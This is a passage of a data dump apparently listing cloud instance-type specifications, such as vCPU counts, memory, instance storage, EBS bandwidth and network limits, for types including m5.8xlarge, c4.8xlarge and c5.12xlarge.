'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5d.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 
Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 61440, 'TotalSizeInGB': 640, 'Disks': [{'SizeInGB': 320, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'unsupported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.8xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 61440}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': 
{'TotalSizeInGB': 640, 'Disks': [{'SizeInGB': 320, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 6800, 'BaselineThroughputInMBps': 850.0, 'BaselineIops': 30000, 'MaximumBandwidthInMbps': 6800, 'MaximumThroughputInMBps': 850.0, 'MaximumIops': 30000}, 'NvmeSupport': 'required', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5.8xlarge', 
'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 6800, 'BaselineThroughputInMBps': 850.0, 'BaselineIops': 30000, 'MaximumBandwidthInMbps': 6800, 'MaximumThroughputInMBps': 850.0, 'MaximumIops': 30000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 
'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5a.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 
'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'TotalSizeInGB': 1200, 'Disks': [{'SizeInGB': 600, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5ad.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1200, 'Disks': [{'SizeInGB': 600, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': 
{'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'TotalSizeInGB': 1200, 'Disks': [{'SizeInGB': 600, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 6800, 'BaselineThroughputInMBps': 850.0, 'BaselineIops': 30000, 'MaximumBandwidthInMbps': 6800, 'MaximumThroughputInMBps': 850.0, 'MaximumIops': 30000}, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 
'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5d.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1200, 'Disks': [{'SizeInGB': 600, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 6800, 'BaselineThroughputInMBps': 850.0, 'BaselineIops': 30000, 'MaximumBandwidthInMbps': 6800, 'MaximumThroughputInMBps': 850.0, 'MaximumIops': 30000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 
6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 61440, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4000, 'BaselineThroughputInMBps': 500.0, 'BaselineIops': 32000, 'MaximumBandwidthInMbps': 4000, 'MaximumThroughputInMBps': 500.0, 'MaximumIops': 32000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 61440}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4000, 'BaselineThroughputInMBps': 500.0, 'BaselineIops': 32000, 'MaximumBandwidthInMbps': 4000, 'MaximumThroughputInMBps': 500.0, 'MaximumIops': 32000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 
'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 73728, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NvmeSupport': 'required', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.9xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 73728}, 
'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 73728, 'TotalSizeInGB': 900, 'Disks': [{'SizeInGB': 900, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 
'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.9xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 73728}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 900, 'Disks': [{'SizeInGB': 900, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 48, 'DefaultCores': 24, 
'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NvmeSupport': 'required', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 
